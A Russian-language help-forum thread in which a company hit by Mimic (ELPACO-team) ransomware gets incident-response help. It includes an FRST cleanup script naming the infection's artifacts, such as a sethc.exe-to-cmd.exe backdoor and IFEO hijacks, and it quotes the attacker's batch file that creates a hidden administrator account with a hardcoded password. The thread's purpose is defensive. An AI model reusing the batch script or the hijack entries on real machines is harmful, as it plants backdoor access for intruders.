mimic/n3wwv43 ransomware Вирус шифровальщик ELPACO-team

[Ezh85]

Добрый день!

Поймали шифровальщика. Прошу помощи. 

Предположительно, взлом был осуществлен через RDP. Полегла вся инфраструктура.

 

Archive.zipFRST.txt

Addition.txt

[safety]

По очистке системы:

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт автоматически очистит систему, и завершит работу без перезагрузки

 

Start::
HKLM\...\Run: [svhostss.exe] => notepad.exe "C:\Users\NoName\AppData\Local\Decryption_INFO.txt" (Нет файла)
HKLM\...\Policies\system: [legalnoticetext] Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences
IFEO\CompatTelRunner.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\logoff.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\perfmon.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchApp.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchIndexer.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchProtocolHost.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\sethc.exe: [Debugger] c:\windows\system32\cmd.exe
IFEO\shutdown.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\taskkill.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\tasklist.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\taskmgr.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\wsqmcons.exe: [Debugger] C:\Windows\System32\Systray.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-04-20]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (Нет файла)
GroupPolicy: Ограничение - Chrome <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {1D088239-875A-405A-B745-78C1D3E6B266} - \Apple\AppleSoftwareUpdate -> Нет файла <==== ВНИМАНИЕ
Task: {3AE5B73F-DFBB-4D64-84CF-BD12BEA09CA7} - \rep -> Нет файла <==== ВНИМАНИЕ
Task: {4ED79AAE-FD1E-4960-A86D-B9F79EB307EA} - \sm1 -> Нет файла <==== ВНИМАНИЕ
Task: {7AC40101-6609-494F-9451-A58D214D8D13} - \curl -> Нет файла <==== ВНИМАНИЕ
Task: {7C9C5F33-157D-4E5D-9881-16BED684B3E4} - \curls -> Нет файла <==== ВНИМАНИЕ
Task: {B15A2FE3-5E8F-48AD-AEBF-60881B47D989} - \MSI -> Нет файла <==== ВНИМАНИЕ
2024-06-09 17:50 - 2024-06-10 00:17 - 000000935 _____ C:\Decryption_INFO.txt
2024-06-09 17:18 - 2024-06-09 20:26 - 000000000 ____D C:\Program Files\Process Hacker 2
2024-06-09 17:18 - 2024-06-09 17:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Process Hacker 2
2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat
End::

 

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение.

Папку C:\FRST\Quarantine добавьте в архив с паролем virus, архив загрузите на облачный диск и дайте ссылку на скачивание архива в ЛС.

 

 

К сожалению, расшифровка файлов по данному типу шифровальщика невозможна без приватного ключа.

 

По Mimic Ransomware, который активен в течение более 1,5 лет, к сожалению, нет в настоящее время расшифровки файлов без приватного ключа. Злоумышленники, стоящие за Mimic используют утекший в сеть билдер Conti чтобы извлечь выгоду из его различных функций и даже улучшить код для более эффективных атак.

-----------

Будьте внимательны,

в ЛС, (после создания темы), к вам могут обратиться с предложением о помощи в расшифровке.

Если предлагают готовое решение с вашим приватным ключом - тогда это злоумышленники (ключ хранится у них),

если предлагают решение: расшифровать бесплатно несколько ваших файлов, как доказательство своих возможностей - и они это смогут сделать, запросив бесплатную расшифровку у злоумышленников, а остальные файлы - за выкуп вашего дешифратора/ключа за ваши деньги, то это могут быть посредники,

здесь основной риск - после получения оплаты посредники просто исчезают из чата или контакта,

если после получения вашей оплаты за дешифратор с ключом посредники исчезают из контакта, то это, увы, были мошенники.

+

проверьте ЛС.

[Ezh85]

Исследую файлы с одного из зараженных компов. По всей видимости был использован целый комплекс ПО на питоне. 

 

[safety]

NoName - сторонняя или служебная учетная запись? пакеты с Python к Mimic, скорее всего не имеют отношения. Кто-то развернул Python, добавил криптобиблиотеки, возможно другие инструменты. С какой целью? возможно для изучения. Надо смотреть по датам развертывания. Злоумышленники с шифрованием приходят уже с готовым установщиком для Mimic.

[Ezh85]

• 2 часа назад, safety сказал:

  NoName - сторонняя или служебная учетная запись? пакеты с Python к Mimic, скорее всего не имеют отношения. Кто-то развернул Python, добавил криптобиблиотеки, возможно другие инструменты. С какой целью? возможно для изучения. Надо смотреть по датам развертывания. Злоумышленники с шифрованием приходят уже с готовым установщиком для Mimic.

  Сторонняя. Была создана злоумышленниками.

[safety]

А что в этом файле?

2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat

[Ezh85]

40 минут назад, safety сказал:

А что в этом файле?

2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat

С помощью этого батника был создан пользователь NoName

 

@echo off
echo ---------
color 0f
set  user=NoName
set  pass=ntpe9gNjIH
set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /Passwordchg:Yes
net localgroup %AdmGroup% %user% /add
WMIC useraccount where name='%user%' set passwordexpires=false
 

Сравнил файлы "записок" с контактами, на каждой машине присвоен у них разный ID, т.е. еще и ключи для расшифровки на каждой будут разные.

Изменено 11 июня пользователем Ezh85

[safety]

К сожалению, мы не сможем вам помочь с дешифровкой файлов после Mimic.

Изменено 20 июня пользователем safety